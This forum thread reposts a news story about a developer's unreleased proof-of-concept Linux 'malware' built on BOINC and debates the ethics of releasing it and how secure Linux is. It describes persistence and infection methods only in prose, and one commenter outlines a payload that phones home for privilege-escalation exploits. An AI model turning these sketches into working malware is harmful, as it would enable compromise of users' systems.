Developer Ponders Release of Linux Malware

Galen

The lack of malware on Linux may be about to change after a developer admitted he has developed a 'package of malware for Unix/Linux'
A developer who claims he is tired of the “Linux is secure” argument has set out to develop a “package of malware for Unix/Linux” in order to help ethical hackers demonstrate the vulnerability of the open source operating system.
"I was fed up with the general consensus that Linux is oh-so-secure and has no malware,” a developer going by the name of buchner.johannes wrote on Ask Slashdot, in posting filed by kdawson.
“After a week of work, I finished a package of malware for Unix/Linux," Johannes wrote. "Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects.”
Johannes said the malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.
“I tested it to be injected by a PHP script (even circumventing safe mode), so that the web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files,” he said.
Johannes claimed the object of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation).
However he admitted to doubts over how ethical it would be to release the toolkit.
He has concerns that a genuine hacker would rip out the BOINC payload and put “in something really evil, could be turned into proper Linux malware.”
“On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary,” he said.
“Technically, it is a nice piece, but should I release it? I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?” he asked.
There was a mix of opinions to Johannes's debate over releasing the malware. One user by the name of Jeff321 said that he believed Johannes has already decided.
“There were two options,” Jeff321 wrote. “1. Release it anonymously and take no credit. 2. Write about it and get some credit (but then you can't actually release it due to legal issues).”
“You can't (and won't) release it now,” he added. “If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.”
Another user, by the name of sopssa also waded in. “The summary says it doesn't actually do anything malicious and it isn't a worm. There is no legal reason why he couldn't release the code and/or a paper about it,” said sopssa.
“The thing is, it's stupid for people to keep thinking their systems are insanely secure,” he wrote. “Linux users fall for this all the time, because they've heard so from lots of other Linux users. It's better to show people that it is actually possible, and maybe it leads to better secured systems too.”

http://www.eweekeurope.co.uk/news/developer-ponders-release-of-linux-malware-2627

Johnboy1951

Johannes said the malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.

That says it all.

It cannot be generally spread like a virus.
It must be executed by the user.

I do not see it as a security problem ....... it is a user problem.

No change from what has been known all along ...... if you want to do something stupid then expect results!

Naikon

^

Agree 100%

Anyone can root even a Solaris or FreeBSD box if it's not secured
properly. The user is generally the cause of most security exploits.

sysctl kern.securelevel=3

Orion

You cannot protect against idiots. Sure - it'd be easy to give root a password and login as it for normal use but only an idiot would do it.

PogMoThoin

This would work better

PhantomBeaker

Johnboy1951 wrote: »

That says it all.

It cannot be generally spread like a virus.
It must be executed by the user.

I do not see it as a security problem ....... it is a user problem.

No change from what has been known all along ...... if you want to do something stupid then expect results!

I have to say, I agree with the "malware" author's intent though. Most of the security comes from the fact that *nix users aren't targetted that much. That's pretty much it.

Now, I'll say straight out that I use webmail exclusively when I'm not in work, but in work I use a mail client. In all places I also use a web browser. Being almost exclusively *nix based, I have a relatively limited number of viable choices, and most are based off a codebase from Mozilla. That constitutes my window to the internet at large, more or less. So, if firefox or thunderbird aren't secure, there's a window in.

One exploit, one unpatched browser or mail client is what's needed to get something in the door. If it's a really gaping hole, it involves allowing execution of some arbitrary file. So that's the way in. (Although, admittedly, those bugs are rare enough)

After that, you'll probably want root. But even without it, you can do an awful amount of damage to a user (delete their homedir - sure, your box is still working, but you've made their day really, really bad), and still start daemons using a non-privileged port.

Now, if you do want root, it isn't very hard to find various local-user privilege escalation exploits. Don't know which one to include in your payload? Simple, just let your initial payload be something that phones home (or a known peer) and get a list of exploits that would apply to some information you could get from uname (think of a wandering metasploit). Pull that exploit, and use it.

You now have root, and can do what you want.

Being honest, it doesn't sound a million miles away from the tactics used by a number of windows security problems. You have a known software base, you just need to look for exploits and users who don't update as often as they should. The lucky thing is, we don't have critical mass - we don't have enough machines out there to make it worth it, because this would rely on a number of exploits being available on the same machine at the same time, which is be an impediment (but not a complete cure) to it spreading, but isn't impossible if you have a greater number of lax users out there.

Sure, it's a "user problem" (most of it happens in userland, so it MUST be a user problem) but it can still wreck someone's day, especially if it nukes their homedirs except for a crontab that will do it all over again tomorrow (and just imagine if that homedir is on the network), and there is certainly the capability to make something like that do its best to hurt as many machines out there as possible.

*Important*: Please note this is purely me thinking out loud. I'm posting purely because I don't like the "We *nix users are invunerable because we use *nix" attitude - there are always ways to make these things work, it just so happens that it's not always worth the effort. It certainly wasn't worth the effort when userbases were smaller, but now you have a VERY popular unix-based system (MacOSX) and one with growing support (Ubuntu - I keep hearing about how people have set that up for their parents/grandparents/dog on an old machine and that they're really very happy with it). After a while, it's going to be more attractive for people to start trying this sort of thing for *nix systems, and all you need is one hole in your browser or mail client...

This paranoid rant has been brought to you by,
Aoife

mehmeh12

But what if you back up your home folder data to an external non networked drive and encrypt data in the home folder?

djmarkus

Girls use Linux? I bet you have a pink theme!

larryone

djmarkus wrote: »

Girls use Linux? I bet you have a pink theme!

She's not that kind of girl =0)

Even the unix OS that is perceived as being the most secure, and even claims to be "secure by default" has had to admit to being compromised... www.openbsd.org
Dan Bernstien offered a $1k prize for anoyne who could find a security hole in djbdns. It was collected.

No assumptions should ever be made when it comes to these things. The only system that can never be compromised is the one that never gets used.

Khannie

PhantomBeaker wrote: »

"We *nix users are invunerable because we use *nix"

This is the thing. Your average linux user is much more tech savvy than your average windows user, so writing malware that requires them to run a shell script or whatever is a giant waste of time and effort. Sure, the landscape may change, but given the statistics in a recent thread, linux has a depressingly LOOOONNNGGGG way to go.

larryone

Khannie wrote: »

This is the thing. Your average linux user is much more tech savvy than your average windows user

True, but if every tech savvy user sets up a machine for their less than tech savvy relatives....
I know I would have had my mothers work machine on linux long ago if it wasnt for applications that dont taste good with wine.
Would I have every confidence that she'd be as careful wrt security as I am??

On average, yea linux users are more aware of how to use machines without falling into pitfalls like "life is so much easier when I use the same password everywhere". But you will find alot of unix based machines out there that can be compromised.